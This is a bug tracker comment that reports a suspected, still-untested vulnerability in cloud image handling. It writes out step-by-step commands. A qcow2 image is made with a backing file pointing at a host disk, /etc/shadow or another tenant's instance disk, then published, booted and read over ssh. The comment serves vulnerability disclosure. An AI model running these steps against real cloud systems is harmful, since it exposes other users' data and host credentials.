Comment 1 for bug 853330

OK. So I'm almost 100% certain that this is a valid attack at this point, but still have not tested. See if you can tell me why the following *wouldn't* work.
Below:
  * FILE is a path to something that you should not be able to read. '/dev/sda' or '/path/to/another/instances/i-0000002/disk' or possibly /etc/shadow.
  * $KERNEL is probably a normal kernel possibly a distro built one
  * $RAMDISK is a fully functional OS in a ramdisk (with an ssh server to reach it), but you probably don't even need this if you have vnc console access (to interactively 'fix' possibly failed initramfs boot).
  * FILE=/dev/sda (or /path/to/likely/other/users/instance/disk)

So, to attack:
 * qemu-img create -f qcow2 -b $FILE my-attack.img
 * cloud-publish-image --kernel-file $KERNEL --ramdisk-file $RAMDISK x86_64 $FILE my-attack-bucket
 * euca-run-instances ami-abcdefg
 * ssh to new (initramfs based rootfs), and start reading from $FILE